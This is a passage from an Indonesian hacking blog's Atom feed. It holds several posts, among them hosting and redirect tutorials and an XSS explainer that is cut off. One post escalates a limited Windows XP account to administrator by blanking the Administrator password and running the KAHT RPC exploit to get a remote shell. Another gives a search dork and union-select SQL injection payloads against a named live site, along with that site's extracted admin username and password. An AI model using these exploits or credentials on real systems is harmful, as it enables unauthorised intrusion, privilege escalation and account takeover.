sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai. &lt;br /&gt; Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox... &lt;br /&gt;&lt;br /&gt; -------------------------------------------------&lt;br /&gt; | Log On to Windows                         | x |&lt;br /&gt; -------------------------------------------------&lt;br /&gt; | User Name : Al-k                              | &lt;br /&gt; | Password : ******                             |&lt;br /&gt; |                                               |&lt;br /&gt; | | Ok | | Cancel | | BLABLABLABLA....|         |&lt;br /&gt; ------------------------------------------------- &lt;br /&gt;Ya, bentuknya kira-kira seperti diatas ... : )... &lt;br /&gt; Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri. &lt;br /&gt;Tekhnik Kedua : &lt;br /&gt; Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ... &lt;br /&gt;C:\Documents and Settings\Al-k&gt;net user&lt;br /&gt;User accounts for \\NOMATTER&lt;br /&gt;  -------------------------------------------------------------------------------&lt;br /&gt;  Administrator Al-k GNU-- keluarga --&lt;br /&gt;  Guest HelpAssistant SUPPORT_388945a0&lt;br /&gt;  VUSR_NOMATTER&lt;br /&gt;  The command completed successfully.&lt;br /&gt;// Anggap saja disini Al-k adalah user yang limited&lt;br /&gt;// Setelah itu masuk ke direktori di mana kaht berada&lt;br /&gt;D:\Data+ku_&gt;&lt;br /&gt;Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;  D:\Data+ku_&gt;kaht 127.0.0.0 127.0.0.3&lt;br /&gt;_________________________________________________&lt;br /&gt;&lt;br /&gt;  KAHT II - MASSIVE RPC EXPLOIT&lt;br /&gt;  DCOM RPC exploit. Modified by aT4r@3wdesign.es&lt;br /&gt;  #haxorcitos &amp;&amp; #localhost @Efnet Ownz you!!!&lt;br /&gt;  FULL VERSION? :) - AUTOHACKING&lt;br /&gt;  ________________________________________________&lt;br /&gt; [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads&lt;br /&gt; [+] Attacking Port: 135. Remote Shell at port: 34522&lt;br /&gt; [+] Scan In Progress...&lt;br /&gt;  - Connecting to 127.0.0.2&lt;br /&gt;&lt;br /&gt;  Sending Exploit to a [WinXP] Server...&lt;br /&gt;  - Conectando con la Shell Remota...&lt;br /&gt;Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;C:\WINDOWS\system32&gt;&lt;br /&gt;Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita&lt;br /&gt; buat akses user yang terbatas tadi menjadi Super User. &lt;br /&gt;&lt;br /&gt;C:\WINDOWS\system32&gt; net localgroup Administrators Al-k /add&lt;br /&gt;&lt;br /&gt;  The command completed successfully.&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :&lt;br /&gt;HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/&lt;br /&gt;, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl &lt;br /&gt; Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (&lt;br /&gt;&lt;br /&gt; // Refferensi :&lt;br /&gt; - Seni Tekhnik Hacking 1 [S’to]&lt;br /&gt; - Echo Zine 10, Exploitasi Windows XP [mRt]&lt;br /&gt; - Iseng Instink&lt;br /&gt; // Greetz :&lt;br /&gt; - y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk &lt;br /&gt; yang kesekian kalinya nih ???] . &amp; Echo staff who can’t mentioned&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-5453971741649334309?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/5453971741649334309/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=5453971741649334309&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/5453971741649334309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/5453971741649334309'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/tekhnik-exploit-password-winxp.html' title='Tekhnik Exploit Password WinXP'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-81505878715513224</id><published>2008-01-30T22:55:00.000-08:00</published><updated>2008-06-29T03:57:41.333-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web Designer'/><title type='text'>Free Hosting &amp; Domain</title><content type='html'>1. Buat domain di http://co.cc &lt;br /&gt;   2. Semisal nama web anda adalah lenk maka nanti domain anda &lt;br /&gt; akanberupa http://www.kuyaninja.co.cc yang ini Bisa Di &lt;br /&gt; Redirect to di bikin DNS Gto &lt;br /&gt;   3. Pas Beres... edit alamat web nya lalu pilih DNS Seting jangan &lt;br /&gt; yang &lt;br /&gt; redirect.. nga asik &lt;br /&gt;   4. Laluu Di suruh masukan DNS nya... &lt;br /&gt;   5. Masukan dns1.000webhost.com ama dns2.000webhost.com &lt;br /&gt;   8. Buka tab baru atau browser baru. &lt;br /&gt;   9. Arahkan browser ke web http://www.000webhost.com/?id=15184 &lt;br /&gt;  10. Itu adalah hostingan gratis yang memberikan cpanel untuk urusan &lt;br /&gt; hostingan. Jadi seperti kita membeli hostingan berbayar (dapat 250mb &lt;br /&gt; free space dan 100GB bandwith) &lt;br /&gt;  11. Daftar disana dan ikuti petunjuknya dengan klik link "order now" &lt;br /&gt;  12. Pada isian order now, masukan domain yang telah anda pilih di &lt;br /&gt; co.cc. saya pakai kuyaninja.co.cc &lt;http://www.kuyaninja.co.cc/blog&gt; &lt;br /&gt; sebagai contoh. maka &lt;br /&gt; kita lihat ada 2 &lt;br /&gt; box paling atas di "I want to host my own domain". Pada box kiri, &lt;br /&gt; masukkan kuyaninja dan pada box kecil disebelah kanan, masukkan co.cc &lt;br /&gt;  13. Isian lainnya silahkan diisi sesuai dengan keinginan &lt;br /&gt;  14. Saat udah selesai proses order dan anda bisa login ke &lt;br /&gt; http://000webhost.com/members &lt;br /&gt;  15. Masukkan username dan password, maka akan muncul halaman account &lt;br /&gt; anda &lt;br /&gt;  16. Klik "manage account" di sebelah kanan &lt;br /&gt;  17. Maka akan keluar domain anda dalam hal ini &lt;br /&gt; http://kuyaninja.co.cc&lt;http://www.kuyaninja.co.cc/blog&gt; &lt;br /&gt; dan klik "view account details" &lt;br /&gt;  22. Silahkan menunggu kira2 2X24 jam untuk melakukan sinkronisasi. &lt;br /&gt; Jika anda mempunyai domain .com .net .org dan lainnya, waktu yang &lt;br /&gt; dibutuhkan untuk sinkronisasi kira-kira 5 menit. &lt;br /&gt;  23. Setelah sinkronisasi selesai, anda bisa mengakses cpanel melalui &lt;br /&gt; http://000webhost.com/members dengan klik "manage account" dan lihat &lt;br /&gt; username yang diberikan. Kemudian klik "access cpanel" dan gunakan &lt;br /&gt; username yang ditentukan dan password yang telah anda tentukan waktu &lt;br /&gt; mendaftar. &lt;br /&gt;  24. Selamat membuat website... &lt;br /&gt; &lt;br /&gt;Sekian tutor simple dari saya :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-81505878715513224?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/81505878715513224/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=81505878715513224&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/81505878715513224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/81505878715513224'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/cari-hosting-gratislook-here.html' title='Free Hosting &amp; Domain'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4645016428991474889</id><published>2008-01-30T22:43:00.000-08:00</published><updated>2008-06-29T03:57:41.334-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web Designer'/><title type='text'>Cara Redirect Situs</title><content type='html'>Karena satu dan lain hal kita ingin mengarahkan orang untuk membuka situs lain saat membuka situs kita. Istilah teknisnya redirect. Alasan tersebut bisa meliputi:&lt;br /&gt;1. Ganti ke alamat baru. Jadi saat orang buka alamat lama otomatis masuk ke alamat baru&lt;br /&gt;3. Digunakan untuk hasil proses suatu form Biar orang tidak dapat mengulang proses suatu form hanya dengan klik refresh maka hail proses tersebut diredirect ke halaman tertentu. Halaman terima kasih misalnya.&lt;br /&gt;&lt;br /&gt;Ada beberapa cara melakukan Redirect halaman web. Pada prinsipnya semuanya mudah kok. Asal kita mau mempelajarinya. Cara tersebut antara lain:&lt;br /&gt;1. Meta Refresh&lt;br /&gt;2. Javascript&lt;br /&gt;&lt;br /&gt;1. Meta Refresh&lt;br /&gt;Put this code into your page that you want to redirect&lt;br /&gt;&lt;br /&gt; &lt;meta http-equiv="refresh" content="second; URL=other_url"&gt;&lt;br /&gt;&lt;br /&gt;second = berapa detik halaman ingin dialihkan. Misalnya 2&lt;br /&gt;other_url = Halaman baru yang akan dikunjungi user&lt;br /&gt;&lt;br /&gt;Taruh script tersebut diantara&lt;br /&gt;&lt;br /&gt; &lt;head&gt;&lt;br /&gt;&lt;br /&gt; &lt;/head&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dalam beberapa kasus kadang sebuah browser tidak mau otomatis redirect ke situs yang kita inginkan. Untuk mengatasinya kamu bisa menambahkan alamat situs yang ingin dituju. Dengan kata lain orang harus klik link tersebut untuk menuju halaman yang dimaksud.&lt;br /&gt;Berikut contohnya&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt; &lt;html&gt;&lt;br /&gt; &lt;head&gt;&lt;br /&gt; &lt;title&gt;You'll be redirected after 2 seconds&lt;/title&gt;&lt;br /&gt; &lt;meta http-equiv="refresh" content="2; URL=http://hardhono.melesat.com"&gt;&lt;br /&gt; &lt;/head&gt;&lt;br /&gt;&lt;br /&gt; &lt;body&gt;&lt;br /&gt; &lt;a href="http://hardhono.melesat.com"&gt;Klik di sini.&lt;/a&gt; bila Anda tidak otomatis pindah ke halaman baru dalam waktu 2 menit&lt;br /&gt; &lt;/body&gt;&lt;br /&gt; &lt;/html&gt;&lt;br /&gt;-----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Jika ingin langsung redirect tanpa ada jeda waktu hanya perlu mengganti content="0;&lt;br /&gt;&lt;br /&gt;2. Javascript&lt;br /&gt;&lt;br /&gt;Dengan Java script kamu juga bisa membuat halaman yang otomatis redirect ke halaman tertentu. Berikut contohnya&lt;br /&gt;&lt;br /&gt;Tanpa jeda waktu&lt;br /&gt;--------------------------------------------------&lt;br /&gt; &lt;html&gt;&lt;br /&gt; &lt;head&gt;&lt;br /&gt; &lt;title&gt;You'll be redirected&lt;/title&gt;&lt;br /&gt; &lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!–&lt;br /&gt; window.location = "http://hardhono.melesat.com"&lt;br /&gt; //–&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;br /&gt; &lt;body&gt;&lt;br /&gt; If your browser doesn’t automatically redirect,&lt;br /&gt; please &lt;a href="http://hardhono.melesat.com"&amp;gtclick here.&lt;/a&gt;&lt;br /&gt; &lt;/body&gt;&lt;br /&gt; &lt;/html&gt;&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dengan jeda waktu&lt;br /&gt;---------------------------&lt;br /&gt; &lt;html&gt;&lt;br /&gt; &lt;head&gt;&lt;br /&gt; &lt;title&gt;You'll be redirected after 2 seconds&lt;/title&gt;&lt;br /&gt; &lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!–&lt;br /&gt; window.setTimeout('window.location="http://hardhono.melesat.com"; ',2000);&lt;br /&gt; //–&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;br /&gt; &lt;body&gt;&lt;br /&gt; If your browser doesn't automatically redirect,&lt;br /&gt; please &lt;a href="http://hardhono.melesat.com"&amp;&gt;click here.&lt;/a&gt;&lt;br /&gt; &lt;/body&gt;&lt;br /&gt; &lt;/html&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Angka 2000 diartikan milisecond atau dapat diartikan 2 detik. Jika ingin men-set 10 tinggal menggantinya menjadi 10000.&lt;br /&gt;&lt;br /&gt;Selamat Mencoba&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4645016428991474889?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4645016428991474889/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4645016428991474889&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4645016428991474889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4645016428991474889'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/cara-redirect-situs.html' title='Cara Redirect Situs'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7804744588463645125</id><published>2008-01-30T22:05:00.000-08:00</published><updated>2008-06-29T03:58:45.000-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>SQL Injection pada X-Ice System V-1</title><content type='html'>Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak&lt;br /&gt;vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].&lt;br /&gt;Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah... :)&lt;br /&gt;Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain &lt;br /&gt;untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.&lt;br /&gt;:)&lt;br /&gt;&lt;br /&gt;Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...&lt;br /&gt;ex : inurl:/devami.asp?id= geri&lt;br /&gt;&lt;br /&gt;Korban yang saya dapatkan adalah :&lt;br /&gt;&lt;br /&gt;http://www.radyopinarim.com/haber1/devami.asp?id=1&lt;br /&gt;&lt;br /&gt;Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.&lt;br /&gt;Yang anda dapatkan adalah kurang lebih error yang seperti ini &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'&lt;br /&gt;&lt;br /&gt;[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)&lt;br /&gt;&lt;br /&gt;/haber1/devami.asp, satýr 8 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.&lt;br /&gt;Untuk mencari username nya anda tinggal mengganti angka 1 dengan &lt;br /&gt;&lt;br /&gt;-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin&lt;br /&gt;&lt;br /&gt;kurang lebih alamat di browser seperti ini :&lt;br /&gt;http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin&lt;br /&gt;&lt;br /&gt;Yang saya dapatkan usernamenya adalah Kadrius&lt;br /&gt;&lt;br /&gt;dan untuk mencari passwordnya &lt;br /&gt;:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-1+union+select+0,sifre,2,3,4,5,6,7+from+admin&lt;br /&gt;&lt;br /&gt;passwordnya adalah 19901990&lt;br /&gt;&lt;br /&gt;Untuk login sebagai admin anda tinggal balik kehalaman &lt;br /&gt;&lt;br /&gt;/admin/kontrol.asp&lt;br /&gt;&lt;br /&gt;Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.&lt;br /&gt;Selamat mencoba, terima kasih.&lt;br /&gt;&lt;br /&gt;Shoutz to : B_scorpio ==&gt; Salute sama perjuangannya menguasai dunia .... huehuehuehue bcanda&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7804744588463645125?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7804744588463645125/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7804744588463645125&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7804744588463645125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7804744588463645125'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/sql-injection-pada-x-ice-system-v-1.html' title='SQL Injection pada X-Ice System V-1'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-3729287148470349526</id><published>2008-01-28T19:57:00.001-08:00</published><updated>2008-06-29T04:46:41.672-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>BAGAIMANA BUG XSS TERJADI</title><content type='html'>&lt;p&gt;&lt;p class="style4" align="left"&gt;Salah satu bug/ kelemahan pada website adalah XSS, bug ini memang sudah agak lama? Tapi masih saja ada web yang memilikinya. Bug XSS adalah suatu kelemahan yang terdapat pada website yang tidak dilengkapi dengan filter. untuk lebih jelasnya perhatikan contoh link dibawah ini:&lt;br /&gt;&lt;br /&gt;&lt;span class="style1"&gt;&lt;em&gt;&lt;strong&gt;http://xxx.com/?option=com_content=&amp;amp;id=60&amp;amp;ktg=xss_bug&lt;/strong&gt;&lt;/em&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;p class="style4"&gt;coba perhatikan karakter setelah tanda tanya “?” pada link diatas, berikut penjelasannya: &lt;/p&gt;&lt;ul class="style4" type="disc"&gt;&lt;li&gt;&lt;strong&gt;option=com_content &lt;/strong&gt;&lt;u&gt;Option&lt;/u&gt;, adalah variabel yang isinya adalah &lt;em&gt;com_content&lt;/em&gt; &lt;/li&gt;&lt;li&gt;&lt;strong&gt;&amp;amp;&lt;/strong&gt; (maksudnya &lt;em&gt;dan&lt;/em&gt; ) &lt;/li&gt;&lt;li&gt;&lt;strong&gt;id=60&lt;/strong&gt; . &lt;u&gt;Id&lt;/u&gt; variabel yang isinya adalah &lt;em&gt;60&lt;/em&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;ktg=xss_bug&lt;/strong&gt; . &lt;u&gt;ktg&lt;/u&gt; variabel yang isinya adalah &lt;em&gt;xss_bug&lt;/em&gt; &lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;p class="style4"&gt;Karakter setelah tanda tanya “?” dan sebelah kirinya samadengan “=” adalah nama variabel.( saya anggap anda sudah mengerti tentang variabel). Variabel ini bertugas menyampaikan keinginan (permintaan) user(pengunjung website) kepada Program (website tersebut). Variabel yang digunakan umumnya ada 2 macam: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;div class="style4"&gt;&lt;strong&gt;Variabel Dalam Program&lt;/strong&gt;&lt;br /&gt;variabel yang berkerja dari dalam program (tidak muncul kepermukaan)&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul class="style4"&gt;&lt;li&gt;&lt;strong&gt;Variabel Luar Program&lt;/strong&gt;&lt;br /&gt;variabel yang berkerja di luar program (tapi masih berhubungan dengan dalam program)&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;p class="style4"&gt;variabel yang digunakan kali ini bisa dikategorikan variabel luar. Contohnya seperti variabel diatas tadi (option, id dan ktg).&lt;br /&gt;&lt;br /&gt;variabel &lt;strong&gt;ktg &lt;/strong&gt;menyimpan nilai xss_bug, variabel ini akan dikirim ke program karena akan diproses untuk memberikan permintaan user. (saya harap anda paham dengan keterangan ini, bila masih bingung coba perhatikan listing di bawah ini!). &lt;/p&gt;&lt;table style="WIDTH: 581px" width="581" align="center" border="2"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="style4" width="616" height="184"&gt;&lt;pre class="style2"&gt;&lt;span class="style1"&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt; Contoh Bug XSS &amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;form name="form1" action="" method="post"&amp;gt;&lt;br /&gt;&amp;lt;input type="text" name="q"&amp;gt;&lt;br /&gt;&amp;lt;input type="submit" name="kirim" value="kirim" &amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;if ($kirim)&lt;br /&gt;{&lt;br /&gt;echo $q;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;span class="style1"&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;p class="style4"&gt;&lt;/p&gt;&lt;p class="style4"&gt;simpan script diatas dengan nama form.php kemudian jalankan pada browser yang sudah terpasang server php kemudian coba anda ketikan "&amp;lt;h1&amp;gt;XSS_BUG&amp;lt;/h1&amp;gt;" (tanpa petik) kemudian klik tombol kirim. lihat bagaimana hasilnya! &lt;/p&gt;&lt;table style="WIDTH: 287px; HEIGHT: 41pxcolor:#000000;" border cellspacing="0" cellpadding="0" width="287" align="center" border="1"&gt;&lt;span style="color:#ffcc00;"&gt;&lt;/span&gt;&lt;tbody&gt;&lt;tr&gt;&lt;span style="color:#ffcc00;"&gt;&lt;/span&gt;&lt;td class="style4" width="147"&gt;&lt;div align="center"&gt;&lt;span style="color:#ffcc00;"&gt;&amp;lt;h1&amp;gt;XSS_BUG&amp;lt;/h1&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;span style="color:#ffcc00;"&gt;&lt;/span&gt;&lt;td class="style4" width="47" bg style="color:#d2d2ca;"&gt;&lt;div align="center"&gt;&lt;span style="color:#ffcc00;"&gt;kirim&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;p class="style4"&gt;Akan anda lihat hasil di browser menampilkan tulisan :&lt;br /&gt;&lt;/p&gt;&lt;h1 class="style5"&gt;XSS_BUG&lt;/h1&gt;&lt;br /&gt;&lt;span class="style4"&gt;seperti inilah xss terjadi, &lt;strong&gt;xss terjadi karena program web tersebut tidak dilengkapi filter tag-tag html ataupun javascript&lt;/strong&gt;. Lantas bagaimana menangani bug ini??&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;p class="style4"&gt;Tanpa basa-basi mari kita pelajari bagaimana cara menangani bug XSS dalam program web kita. Berdasarkan contoh diatas tadi , dapat saya simpulkan bahwa XSS terjadi karena program web tidak dilengkapi Filter Tags HTML ataupun Javascript. Jadi untuk menangani bug ini kita cukup memberikan filter pada program web kita.&lt;u&gt;Caranya :&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Dalam PHP sendiri terdapat beberapa fungsi untuk mengganti karakter, diantaranya terdapat: &lt;span style="color:#ff6666;"&gt;ereg_replace(), eregi_replace(), str_replace(), dll&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Anda bisa menggunakan fungsi replce yang mana saja, kali ini saya akan memberikan contoh dengan menggunakan &lt;span style="color:#ff6666;"&gt;ereg_regplace() &lt;/span&gt;&lt;br /&gt;&lt;table width="50%" align="center" border="1"  style="color:#000000;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="style4"&gt;&lt;pre&gt;&lt;span class="style2"&gt;&lt;span class="style1"&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt; Contoh Bug XSS &amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;form name="form1" action="" method="post"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input type="text" name="q"&amp;gt;&lt;br /&gt;&amp;lt;input type="submit" name="kirim" value="kirim" &amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;if ($kirim)&lt;br /&gt;{&lt;/span&gt;&lt;br /&gt;&lt;span class="style2"&gt;$q=ereg_replace("&amp;lt;","&amp;amp;lt;",$q);&lt;br /&gt;$q=ereg_replace("&amp;gt;","&amp;amp;gt;",$q);&lt;br /&gt;echo $q;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;span class="style1"&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/span&gt; &lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="style4"&gt;&lt;br /&gt;&lt;br /&gt;coba anda lakukan hal yang sama seperti tadi, ketikan &amp;lt;h1&amp;gt;XSS_BUG&amp;lt;/h1&amp;gt; pada text box kemudian klik tombol kirim!&lt;br /&gt;&lt;br /&gt;pada perubahan kali ini, bagaimana hasilnya?? Akan anda lihat hasilnya sebagai berikut :&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&amp;lt;h1&amp;gt;XSS_BUG&amp;lt;/h1&amp;gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;ini artinya bug XSS tidak berhasil. Program telah mengganti string &amp;lt; menjadi &amp;amp;lt; begitu juga &amp;gt; diganti oleh "&amp;amp;gt;"&lt;br /&gt;&lt;br /&gt;Karakter “&amp;amp;lt;” (tanpa petik) 